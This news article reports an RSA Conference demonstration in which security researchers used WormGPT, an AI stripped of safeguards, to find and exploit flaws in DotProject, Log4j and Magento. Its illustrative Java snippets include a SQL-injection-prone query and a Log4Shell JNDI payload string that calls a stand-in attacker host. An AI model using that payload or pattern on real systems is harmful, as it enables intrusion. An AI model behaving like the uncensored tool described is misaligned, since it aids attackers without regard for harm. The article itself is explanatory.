A hot potato: A new wave of AI tools designed without ethical safeguards is empowering hackers to identify and exploit software vulnerabilities faster than ever before. As these “evil AI” platforms evolve rapidly, cybersecurity experts warn that traditional defenses will struggle to keep pace.
On a recent morning at the annual RSA Conference in San Francisco, attendees packed a room at Moscone Center for what was billed as a technical exploration of artificial intelligence's role in modern hacking.
The session, led by Sherri Davidoff and Matt Durrin of LMG Security, promised more than just theory; it would offer a rare, live demonstration of so-called “evil AI” in action, a topic that has rapidly moved from cyberpunk fiction to real-world concern.
Davidoff, LMG Security’s founder and CEO, set the stage with a sober reminder of the ever-present threat from software vulnerabilities. But it was Durrin, the firm’s Director of Training and Research, who quickly shifted the tone, reports Alaina Yee, senior editor at PCWorld.
He introduced the concept of “evil AI” – artificial intelligence tools designed without ethical guardrails, capable of identifying and exploiting software flaws before defenders can react.
“What if hackers utilize their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?” Durrin asked the audience, previewing the unsettling demonstrations to come.
The team's attempts to acquire one of these rogue AIs (GhostGPT and DevilGPT among the candidates) usually ended in frustration or discomfort. Their persistence finally paid off when they tracked down WormGPT, a tool highlighted in a post by security journalist Brian Krebs, through Telegram channels for $50.
As Durrin explained, WormGPT is essentially ChatGPT stripped of its ethical constraints. It will answer any question, no matter how destructive or illegal the request. However, the presenters emphasized that the true threat lies not in the tool’s existence but in its capabilities.
The LMG Security team began by testing an older version of WormGPT on DotProject, an open-source project management platform. The AI correctly identified a SQL injection vulnerability and proposed a basic exploit, though it failed to produce a working attack – likely because it couldn't process the entire codebase.
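Neither the presenters' prompts nor DotProject's flawed code appear in the report, but the vulnerability class itself is well understood. As a purely illustrative sketch (DotProject is actually written in PHP; Java is used here for consistency, and the table and method names are invented), this is the kind of pattern an AI code scanner flags, alongside the standard fix:

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class ProjectLookup {
    // VULNERABLE: user-controlled input is concatenated straight into the
    // SQL string, so a value like "1 OR 1=1" (or a UNION SELECT clause)
    // rewrites the query. This is the classic pattern scanners flag.
    static ResultSet findProjectUnsafe(Connection conn, String projectId) throws SQLException {
        String sql = "SELECT * FROM projects WHERE id = " + projectId;
        return conn.createStatement().executeQuery(sql);
    }

    // SAFE: a prepared statement binds the input as data, never as SQL,
    // so the same hostile value is treated as a literal.
    static ResultSet findProjectSafe(Connection conn, String projectId) throws SQLException {
        PreparedStatement ps = conn.prepareStatement("SELECT * FROM projects WHERE id = ?");
        ps.setString(1, projectId);
        return ps.executeQuery();
    }
}
```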
A newer version of WormGPT was then tasked with analyzing the infamous Log4j vulnerability. This time, the AI not only found the flaw but provided enough information that, as Davidoff observed, “an intermediate hacker” could use it to craft an exploit.
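The "infamous Log4j vulnerability" is almost certainly Log4Shell (CVE-2021-44228), which is exhaustively documented in public advisories. The sketch below (the class and handler names are invented) shows why the bug was so dangerous: on affected Log4j 2 releases (2.0-beta9 through 2.14.1), merely logging attacker-controlled text triggered a JNDI lookup on any embedded ${...} expression:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginHandler {
    private static final Logger log = LogManager.getLogger(LoginHandler.class);

    // On Log4j 2.0-beta9 through 2.14.1, logging attacker-controlled input
    // was enough: a username (or User-Agent header) such as
    // "${jndi:ldap://attacker.example/a}" made the logger resolve the JNDI
    // reference and, under common JVM settings of the era, load remote code.
    void onFailedLogin(String username) {
        // Parameterized logging does NOT help here: on vulnerable versions
        // the formatted message was scanned for ${...} lookups after
        // substitution. The real fix was upgrading (2.16.0 removed message
        // lookups entirely), not sanitizing inputs.
        log.warn("Failed login attempt for user {}", username);
    }
}
```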
The real shock came with the latest iteration: WormGPT offered step-by-step instructions, complete with code tailored to the test server, and those instructions worked flawlessly.
To push the limits further, the team set up a deliberately vulnerable Magento e-commerce installation. WormGPT identified a complex two-part vulnerability that mainstream security tools like SonarQube, and even ChatGPT itself, had missed. During the live demonstration, the rogue AI produced a comprehensive, step-by-step hacking guide, unprompted and with alarming speed.
As the session drew to a close, Davidoff reflected on the rapid evolution of these malicious AI tools.
“I’m a little nervous about where we will [be] with hacker tools in six months because you can clearly see the progress that has been made over the past year,” she said. The audience’s uneasy silence echoed the sentiment, Yee wrote.
Image credit: PCWorld, LMG Security